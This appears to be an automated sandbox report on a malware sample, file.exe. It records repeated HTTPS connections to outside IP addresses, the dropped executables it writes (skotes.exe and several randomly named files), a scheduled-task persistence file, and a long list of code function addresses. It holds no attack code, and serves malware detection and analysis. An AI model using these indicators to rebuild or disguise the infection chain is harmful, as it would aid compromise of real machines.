Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50471
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50370
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50570 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50057
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50059
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50195
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50080 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50195 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50080
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50384
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443

Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49950 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50048 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50055 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50057 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50060 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50080 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50107 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50124 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50132 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50137 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50140 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50145 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.55:443 -> 192.168.2.4:50154 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.182.141.63:443 -> 192.168.2.4:50370 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: section name:
Source: DocumentsGDHIDHIEGI.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .rsrc
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: df5dd36577.exe.11.dr	Static PE information: section name:
Source: df5dd36577.exe.11.dr	Static PE information: section name: .rsrc
Source: df5dd36577.exe.11.dr	Static PE information: section name: .idata
Source: df5dd36577.exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name: .idata
Source: 76f1524c8d.exe.11.dr	Static PE information: section name:
Source: 76f1524c8d.exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .rsrc
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: e708276138.exe.11.dr	Static PE information: section name:
Source: e708276138.exe.11.dr	Static PE information: section name: .rsrc
Source: e708276138.exe.11.dr	Static PE information: section name: .idata
Source: e708276138.exe.11.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C8162C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

0_2_6C8162C0

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp			Jump to behavior
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	File created: C:\Windows\Tasks\skotes.job			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69AC60	0_2_6C69AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76AC30	0_2_6C76AC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C756C00	0_2_6C756C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68ECC0	0_2_6C68ECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EECD0	0_2_6C6EECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75ED70	0_2_6C75ED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BAD50	0_2_6C7BAD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81CDC0	0_2_6C81CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C818D20	0_2_6C818D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C694DB0	0_2_6C694DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C726D90	0_2_6C726D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72EE70	0_2_6C72EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770E20	0_2_6C770E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69AEC0	0_2_6C69AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C730EC0	0_2_6C730EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C716E90	0_2_6C716E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C752F70	0_2_6C752F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FEF40	0_2_6C6FEF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0F20	0_2_6C7D0F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696F10	0_2_6C696F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76EFF0	0_2_6C76EFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690FE0	0_2_6C690FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D8FB0	0_2_6C7D8FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69EFB0	0_2_6C69EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C764840	0_2_6C764840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E0820	0_2_6C6E0820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71A820	0_2_6C71A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7968E0	0_2_6C7968E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77C8C0	0_2_6C77C8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C8960	0_2_6C6C8960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6900	0_2_6C6E6900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AC9E0	0_2_6C7AC9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C49F0	0_2_6C6C49F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7509B0	0_2_6C7509B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7209A0	0_2_6C7209A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74A9A0	0_2_6C74A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70CA70	0_2_6C70CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C748A30	0_2_6C748A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73EA00	0_2_6C73EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C70EA80	0_2_6C70EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C796BE0	0_2_6C796BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77EBD0	0_2_6C77EBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C730BA0	0_2_6C730BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A8460	0_2_6C6A8460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71A430	0_2_6C71A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F4420	0_2_6C6F4420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72A4D0	0_2_6C72A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6D64D0	0_2_6C6D64D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA480	0_2_6C7BA480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C730570	0_2_6C730570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F2560	0_2_6C6F2560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D8550	0_2_6C7D8550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E8540	0_2_6C6E8540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C794540	0_2_6C794540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71E5F0	0_2_6C71E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75A5E0	0_2_6C75A5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6845B0	0_2_6C6845B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EC650	0_2_6C6EC650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EE6E0	0_2_6C6EE6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C72E6E0	0_2_6C72E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B46D0	0_2_6C6B46D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C710700	0_2_6C710700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BA7D0	0_2_6C6BA7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6DE070	0_2_6C6DE070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758010	0_2_6C758010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75C000	0_2_6C75C000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76C0B0	0_2_6C76C0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A00B0	0_2_6C6A00B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C688090	0_2_6C688090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8140	0_2_6C6F8140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C706130	0_2_6C706130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C774130	0_2_6C774130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6901E0	0_2_6C6901E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C718260	0_2_6C718260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C728250	0_2_6C728250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8162C0	0_2_6C8162C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C768220	0_2_6C768220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75A210	0_2_6C75A210
